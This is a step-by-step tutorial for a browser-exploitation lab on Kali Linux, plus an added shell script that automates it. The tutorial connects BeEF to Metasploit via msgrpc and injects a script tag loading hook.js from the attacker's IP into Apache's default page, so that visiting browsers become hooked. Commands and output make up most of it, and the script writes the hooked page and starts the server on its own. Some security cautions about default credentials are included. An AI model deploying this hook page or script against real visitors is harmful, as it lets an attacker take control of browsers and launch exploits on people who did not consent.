1. Check the local IP address
root@kali:~# ip add
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:05:7a:89 brd ff:ff:ff:ff:ff:ff
    inet 192.168.34.220/24 brd 192.168.34.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fe05:7a89/64 scope link
       valid_lft forever preferred_lft forever
root@kali:~#
The attacker box is 192.168.34.220 on eth0. That is the address the hook URL and the msgrpc ServerHost below must use: the victim's browser has to fetch hook.js from it, so 127.0.0.1 will not work.
2. Embed the hook URL in HTML
Hook URL: http://192.168.34.220:3000/hook.js
Any page the victim loads can pull the hook in with a plain script tag:
<script src="http://192.168.34.220:3000/hook.js"></script>
3. Edit index.html in the Apache document root and save it
root@kali:~# vim /var/www/index.html
<html><body><h1>It works!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added, yet.</p>
<script src="http://192.168.34.220:3000/hook.js"></script>
</body></html>
The path /var/www/index.html is the Apache 2.2 document root used by Kali 1.x; on Apache 2.4 (current Kali) the default document root is /var/www/html, so put the hooked page there instead.
4. Start msfconsole
root@kali:~# msfconsole
[banner]
       =[ metasploit v4.11.4-2015071402                   ]
+ -- --=[ 1476 exploits - 931 auxiliary - 246 post        ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >
5. Load the msgrpc plugin (this is what BeEF connects to)
msf > load msgrpc ServerHost=192.168.34.220 Pass=abc123
[*] MSGRPC Service: 192.168.34.220:55552
[*] MSGRPC Username: msf
[*] MSGRPC Password: abc123
[*] Successfully loaded plugin: msgrpc
msf >
The host, port (55552), user (msf) and password given here must match the values in BeEF's Metasploit extension config, /usr/share/beef-xss/extensions/metasploit/config.yaml, and the Metasploit extension must be enabled in BeEF's config.yaml; otherwise BeEF starts without the Metasploit modules. Note that msgrpc hands full control of the framework to anyone who can reach it with these credentials, so bind it only where BeEF needs to reach it and replace abc123 with a real password in both places.
6. Start BeEF
root@kali:~# cd /usr/share/beef-xss/
root@kali:/usr/share/beef-xss# ls
beef  beef_cert.pem  beef_key.pem  config.yaml  core  db  extensions  Gemfile  Gemfile.lock  modules
root@kali:/usr/share/beef-xss# ./beef
[14:00:02][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000].
[14:00:02][*] Browser Exploitation Framework (BeEF) 0.4.4.9-alpha
[14:00:02]     |   Twit: @beefproject
[14:00:02]     |   Site: http://beefproject.com
[14:00:02]     |   Blog: http://blog.beefproject.com
[14:00:02]     |_  Wiki: https://github.com/beefproject/beef/wiki
[14:00:02][*] Project Creator: Wade Alcorn (@WadeAlcorn)
[14:00:04][*] Successful connection with Metasploit.
[14:00:07][*] Loaded 289 Metasploit exploits.
[14:00:08][*] BeEF is loading. Wait a few seconds...
[14:00:13][*] 11 extensions enabled.
[14:00:13][*] 485 modules enabled.
[14:00:13][*] 2 network interfaces were detected.
[14:00:13][+] running on network interface: 127.0.0.1
[14:00:13]     |   Hook URL: http://127.0.0.1:3000/hook.js
[14:00:13]     |_  UI URL: http://127.0.0.1:3000/ui/panel
[14:00:13][+] running on network interface: 192.168.34.220
[14:00:13]     |   Hook URL: http://192.168.34.220:3000/hook.js
[14:00:13]     |_  UI URL: http://192.168.34.220:3000/ui/panel
[14:00:13][*] RESTful API key: f01d946e3c9b3e9139f1da782f49be9bb3fd88a0
[14:00:13][*] HTTP Proxy: http://127.0.0.1:6789
[14:00:13][*] BeEF server started (press control+c to stop)
The lines "Successful connection with Metasploit" and "Loaded 289 Metasploit exploits" confirm that the msgrpc settings from step 5 matched BeEF's extension config. Then open a browser at http://127.0.0.1:3000/ui/authentication and log in with beef/beef. Those are the default credentials from config.yaml (beef: credentials:), and the output shows the panel is also served on 192.168.34.220:3000, so change them before hooking anything on a network you do not fully control.
7. Start the Apache service
root@kali:~# /etc/init.d/apache2 start
[....] Starting web server: apache2apache2: apr_sockaddr_info_get() failed for kali
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName
. ok
root@kali:~#
The apr_sockaddr_info_get() / ServerName warning is harmless here (Apache still starts and serves the page); it goes away if you set ServerName in the Apache configuration.
8. On the target machine
Open a browser and enter the address 192.168.34.220. Apache serves the edited index.html, the browser loads hook.js from port 3000, and from then on it polls the BeEF server and shows up in the panel.
9. Check the hooked hosts on the server side
The hooked browser appears under "Online Browsers" in the BeEF panel; the rest of the operations are left for you to explore.
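The whole setup above (steps 1, 2, 3 and 7) is a few shell commands, and the place it most often goes wrong is the hook URL pointing at an address or port the victim cannot reach. Here is an added example, not code from the original post or from the BeEF project, that scripts those steps and adds that check. The hook path /hook.js and port 3000 come from the post; the BEEF_PORT and DOCROOT defaults, the DEPLOY flag and the hook_reachable check are this example's own assumptions.

```shell
#!/bin/sh
# Added example, not part of the original post: automates steps 1, 2, 3 and 7
# (find the LAN address, write the hooked index.html, start Apache) and checks
# that BeEF is actually serving hook.js before the page goes live.
# Assumed (not in the original): BEEF_PORT/DOCROOT defaults, the DEPLOY flag
# and the hook_reachable check. /hook.js and port 3000 are from the post.

BEEF_PORT="${BEEF_PORT:-3000}"
DOCROOT="${DOCROOT:-/var/www}"    # /var/www/html on Apache 2.4 (current Kali)

# Step 1: first global (non-loopback) IPv4 address, parsed from the one-line-
# per-address form `ip -o -4 addr show`, read on stdin so a captured sample
# can be fed in for testing.
primary_ipv4() {
    awk '$3 == "inet" && $2 != "lo" && /scope global/ { split($4, a, "/"); print a[1]; exit }'
}

# Steps 2-3: the default Apache page with the BeEF hook appended, as in the post.
hooked_page() {
    addr="$1"; port="$2"
    cat <<EOF
<html><body><h1>It works!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added, yet.</p>
<script src="http://${addr}:${port}/hook.js"></script>
</body></html>
EOF
}

# Check (not in the original): the victim's browser must be able to fetch
# hook.js from this address, so confirm BeEF answers 200 there first.
hook_reachable() {
    code="$(curl -s -o /dev/null -w '%{http_code}' "http://$1:$2/hook.js")"
    [ "$code" = "200" ]
}

# Step 7: write the page and start Apache. Only runs when DEPLOY=1 is set, so
# the functions above can be sourced or tested without touching the system.
deploy_hook_page() {
    addr="$(ip -o -4 addr show | primary_ipv4)"
    [ -n "$addr" ] || { echo "no global IPv4 address found" >&2; return 1; }
    hook_reachable "$addr" "$BEEF_PORT" || {
        echo "BeEF is not serving http://$addr:$BEEF_PORT/hook.js; start ./beef first" >&2
        return 1
    }
    hooked_page "$addr" "$BEEF_PORT" > "$DOCROOT/index.html"
    echo "hook page written to $DOCROOT/index.html (hook http://$addr:$BEEF_PORT/hook.js)"
    service apache2 start
}

if [ "${DEPLOY:-0}" = "1" ]; then
    deploy_hook_page
fi
```

Run it as DEPLOY=1 sh hookpage.sh after ./beef is up; without DEPLOY=1 it only defines the functions, which is what lets the address parser and page generator be exercised against a captured ip output instead of the live machine.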